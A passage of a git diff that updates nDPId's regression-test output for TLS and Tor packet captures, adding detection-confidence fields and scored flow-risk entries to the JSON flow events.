-00877{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1578254908457,"flow_last_seen":1578254908490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1885,"flow_avg_l4_payload_len":314,"midstream":0,"ts_msec":1578254908490,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
-03566{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1578254908457,"flow_last_seen":1578254908490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":5989,"flow_avg_l4_payload_len":544,"midstream":0,"ts_msec":1578254908490,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","server_names":"p2.shared.global.fastly.net,*.12wbt.com,*.2bleacherreport.com,*.3bleacherreport.com,*.4bleacherreport.com,*.8bleacherreport.com,*.abuse.ch,*.acdn-it.ps-pantheon.com,*.cdn.livingmap.com,*.content.plastiq.com,*.dimensions.ai,*.dollarshaveclub.co.uk,*.dollarshaveclub.com,*.dontpayfull.com,*.ebisubook.com,*.foreignaffairs.com,*.fs.jibjab.com,*.fs.unitprints.com,*.ggleap.com,*.goodeggs.com,*.huevosbuenos.com,*.indy.myomnigon.com,*.jwatch.org,*.kingsfordcharcoal.com.au,*.lancenters.com,*.madebywe.com,*.minirodini.com,*.modcloth.net,*.orionlabs.io,*.ps-pantheon.com,*.scodle.com,*.steelseries.com,*.theforeman.org,*.uploads.eversign.com,*.uploads.schoox.com,*.vts.com,*.x.stg1.ebisubook.com,*.yang2020.com,12wbt.com,2bleacherreport.com,3bleacherreport.com,4bleacherreport.com,8bleacherreport.com,abuse.ch,brita.com,cdn.fwupd.org,cdn.livingmap.com,cdn.seated.com,cdn.skillacademy.com,clinicaloptions.com,clorox.com,content-preprod.beaverbrooksweb2.co.uk,content.beaverbrooks.co.uk,content.plastiq.com,coolmathgames.com,copterroyale.coolmathgames.com,d8-dev.coolmathgames.com,deflyio.coolmathgames.com,delivery-api.evadacms.com,dimensions.ai,dollarshaveclub.co.uk,dollarshaveclub.com,dontpayfull.com,eluniverso.com,email.amg-group.co,email.tekoforlife.co.uk,feedmarket.fr,freshstep.com,ggleap.com,goodeggs.com,heap.io,huevosbuenos.com,identity.linuxfoundation.org,joebiden.com,jwatch.org,kingsford.co.nz,kingsfordcharcoal.com.au,lancenters.com,lists.linuxfoundation.org,m-stage.coolmathgames.com,m.coolmathgames.com,madebywe.com,minirodini.com,modcloth.net,orionlabs.io,puritanmedproducts.com,reviews.org,rg-video-staging.ruangguru.com,rg-video.ruangguru.com,ruangguru.com,scodle.com,stage.coolmathgames.com,staging.appblade.com,steelseries.com,stg.platform.eluniverso.com,test.brita.com,test.heap.io,test.joebiden.com,test.ruangguru.com,theforeman.org,video-cdn.quipper.com,videos.calcworkshop.com,vts.com,www.101network.com,www.autos101.com,www.brita.com,www.clorox.com,www.collider.com,www.coolmathgames.com,www.eluniverso.com,www.flinto.com,www.freshstep.com,www.heap.io,www.holagente.com,www.icsydney.com.au,www.joebiden.com,www.kingsford.co.nz,www.mrnatty.com,www.myjewellerystory.com.au,www.myjs.com,www.netacea.com,www.parenting101.com,www.puritanmedproducts.com,www.reviews.org,www.sba.sa,www.shashatcom.sa,www.uat.ontariocolleges.ca,www.vacation101.com,www.walterspeople.co.uk,www.westwayelectricsupply.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=p2.shared.global.fastly.net","alpn":"http\/1.1","fingerprint":"E9:34:DF:E0:C5:31:3C:59:7E:E2:57:44:F2:82:E9:80:F5:5D:05:4B"}}
-00659{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":48,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1578254908457,"flow_last_seen":1578254908551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":19077,"flow_avg_l4_payload_len":397,"midstream":0,"ts_msec":1578254908551,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Media"}}
+00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578254908457,"flow_last_seen":1578254908475,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1578254908475,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
+00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1578254908457,"flow_last_seen":1578254908490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1885,"flow_avg_l4_payload_len":314,"midstream":0,"ts_msec":1578254908490,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
+03592{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1578254908457,"flow_last_seen":1578254908490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":5989,"flow_avg_l4_payload_len":544,"midstream":0,"ts_msec":1578254908490,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","server_names":"p2.shared.global.fastly.net,*.12wbt.com,*.2bleacherreport.com,*.3bleacherreport.com,*.4bleacherreport.com,*.8bleacherreport.com,*.abuse.ch,*.acdn-it.ps-pantheon.com,*.cdn.livingmap.com,*.content.plastiq.com,*.dimensions.ai,*.dollarshaveclub.co.uk,*.dollarshaveclub.com,*.dontpayfull.com,*.ebisubook.com,*.foreignaffairs.com,*.fs.jibjab.com,*.fs.unitprints.com,*.ggleap.com,*.goodeggs.com,*.huevosbuenos.com,*.indy.myomnigon.com,*.jwatch.org,*.kingsfordcharcoal.com.au,*.lancenters.com,*.madebywe.com,*.minirodini.com,*.modcloth.net,*.orionlabs.io,*.ps-pantheon.com,*.scodle.com,*.steelseries.com,*.theforeman.org,*.uploads.eversign.com,*.uploads.schoox.com,*.vts.com,*.x.stg1.ebisubook.com,*.yang2020.com,12wbt.com,2bleacherreport.com,3bleacherreport.com,4bleacherreport.com,8bleacherreport.com,abuse.ch,brita.com,cdn.fwupd.org,cdn.livingmap.com,cdn.seated.com,cdn.skillacademy.com,clinicaloptions.com,clorox.com,content-preprod.beaverbrooksweb2.co.uk,content.beaverbrooks.co.uk,content.plastiq.com,coolmathgames.com,copterroyale.coolmathgames.com,d8-dev.coolmathgames.com,deflyio.coolmathgames.com,delivery-api.evadacms.com,dimensions.ai,dollarshaveclub.co.uk,dollarshaveclub.com,dontpayfull.com,eluniverso.com,email.amg-group.co,email.tekoforlife.co.uk,feedmarket.fr,freshstep.com,ggleap.com,goodeggs.com,heap.io,huevosbuenos.com,identity.linuxfoundation.org,joebiden.com,jwatch.org,kingsford.co.nz,kingsfordcharcoal.com.au,lancenters.com,lists.linuxfoundation.org,m-stage.coolmathgames.com,m.coolmathgames.com,madebywe.com,minirodini.com,modcloth.net,orionlabs.io,puritanmedproducts.com,reviews.org,rg-video-staging.ruangguru.com,rg-video.ruangguru.com,ruangguru.com,scodle.com,stage.coolmathgames.com,staging.appblade.com,steelseries.com,stg.platform.eluniverso.com,test.brita.com,test.heap.io,test.joebiden.com,test.ruangguru.com,theforeman.org,video-cdn.quipper.com,videos.calcworkshop.com,vts.com,www.101network.com,www.autos101.com,www.brita.com,www.clorox.com,www.collider.com,www.coolmathgames.com,www.eluniverso.com,www.flinto.com,www.freshstep.com,www.heap.io,www.holagente.com,www.icsydney.com.au,www.joebiden.com,www.kingsford.co.nz,www.mrnatty.com,www.myjewellerystory.com.au,www.myjs.com,www.netacea.com,www.parenting101.com,www.puritanmedproducts.com,www.reviews.org,www.sba.sa,www.shashatcom.sa,www.uat.ontariocolleges.ca,www.vacation101.com,www.walterspeople.co.uk,www.westwayelectricsupply.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=p2.shared.global.fastly.net","alpn":"http\/1.1","fingerprint":"E9:34:DF:E0:C5:31:3C:59:7E:E2:57:44:F2:82:E9:80:F5:5D:05:4B"}}
+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":48,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1578254908457,"flow_last_seen":1578254908551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":19077,"flow_avg_l4_payload_len":397,"midstream":0,"ts_msec":1578254908551,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}}
 00173{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":48,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","total-events-serialized":10}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 48/48
@@ -16,10 +16,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4768500 bytes
-~~ total memory freed........: 4768500 bytes
-~~ total allocations/frees...: 99738/99738
+~~ total memory allocated....: 4853453 bytes
+~~ total memory freed........: 4853453 bytes
+~~ total allocations/frees...: 101328/101328
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 178 chars
-~~ json string max len.......: 3571 chars
-~~ json string avg len.......: 1770 chars
+~~ json string max len.......: 3597 chars
+~~ json string avg len.......: 1783 chars
diff --git a/test/results/tor.pcap.out b/test/results/tor.pcap.out
index 5400e4711..92b77a92c 100644
--- a/test/results/tor.pcap.out
+++ b/test/results/tor.pcap.out
@@ -9,31 +9,31 @@
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1383821665420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1383821665420,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A15AAIAGe0DAqAH8W49d8semAbvp\/8nSAAAAAIACIABVtgAAAgQFtAEDAwgBAQQC"}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1383821665491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1383821665491,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAAC4G0J5bj13ywKgB\/AG7x6b4Wbj86f\/J04ASOQiLRwAAAgQFtAEBBAIBAwMH"}
 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1383821665491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1383821665491,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA19AAIAGe0vAqAH8W49d8semAbvp\/8nT+Fm4\/VAQAQAEIgAAAAAAAAAA"}
-00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821665420,"flow_last_seen":1383821665498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1383821665498,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.ct7ctrgb6cr7.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01048{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821665420,"flow_last_seen":1383821665606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":748,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":160,"midstream":0,"ts_msec":1383821665606,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.ct7ctrgb6cr7.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.xkgk7fdx362yyyxib.com","subjectDN":"CN=www.g6ghvisevf3ibuu5.net","fingerprint":"94:F9:FF:E2:7F:DB:1F:B8:19:65:20:6F:F6:DE:B6:A5:D5:AF:14:C7"}}
+00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821665420,"flow_last_seen":1383821665498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1383821665498,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.ct7ctrgb6cr7.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01153{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821665420,"flow_last_seen":1383821665606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":748,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":160,"midstream":0,"ts_msec":1383821665606,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.ct7ctrgb6cr7.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.xkgk7fdx362yyyxib.com","subjectDN":"CN=www.g6ghvisevf3ibuu5.net","fingerprint":"94:F9:FF:E2:7F:DB:1F:B8:19:65:20:6F:F6:DE:B6:A5:D5:AF:14:C7"}}
 00351{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":25,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383821666212,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
 00161{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":25,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821666407,"flow_last_seen":1383821666407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1383821666407,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1383821666407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1383821666407,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A2hAAIAG0l3AqAH8Ljs0H8enAbvpjJYYAAAAAIACIADhCQAAAgQFtAEDAwgBAQQC"}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1383821666480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1383821666480,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAACwGKcYuOzQfwKgB\/AG7x6cxNPZ86YyWGYASchBnNQAAAgQFtAEBBAIBAwMK"}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1383821666481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1383821666481,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA2lAAIAG0mjAqAH8Ljs0H8enAbvpjJYZMTT2fVAQAQAZGwAAAAAAAAAA"}
-00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821666407,"flow_last_seen":1383821666482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1383821666482,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","16":"Suspicious DGA domain name","22":"Unsafe Protocol"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.e6r5p57kbafwrxj3plz.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01132{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":32,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821666407,"flow_last_seen":1383821666558,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":749,"flow_tot_l4_payload_len":971,"flow_avg_l4_payload_len":161,"midstream":0,"ts_msec":1383821666558,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","16":"Suspicious DGA domain name","22":"Unsafe Protocol"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.e6r5p57kbafwrxj3plz.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.gmvuy6mtjbxevwo3w.com","subjectDN":"CN=www.bpcau5b3haif5els.net","fingerprint":"3A:B1:8A:6F:C3:F6:41:ED:77:D5:40:C3:85:79:8B:62:46:BC:65:9C"}}
+01188{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821666407,"flow_last_seen":1383821666482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1383821666482,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.e6r5p57kbafwrxj3plz.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01400{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":32,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821666407,"flow_last_seen":1383821666558,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":749,"flow_tot_l4_payload_len":971,"flow_avg_l4_payload_len":161,"midstream":0,"ts_msec":1383821666558,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.e6r5p57kbafwrxj3plz.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.gmvuy6mtjbxevwo3w.com","subjectDN":"CN=www.bpcau5b3haif5els.net","fingerprint":"3A:B1:8A:6F:C3:F6:41:ED:77:D5:40:C3:85:79:8B:62:46:BC:65:9C"}}
 00351{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":55,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383821668212,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
 00161{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":55,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821668403,"flow_last_seen":1383821668403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1383821668403,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1383821668403,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1383821668403,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A3VAAIAGx5DAqAH8JuVGNceoAbuUs9YxAAAAAIACIADrCAAAAgQFtAEDAwgBAQQC"}
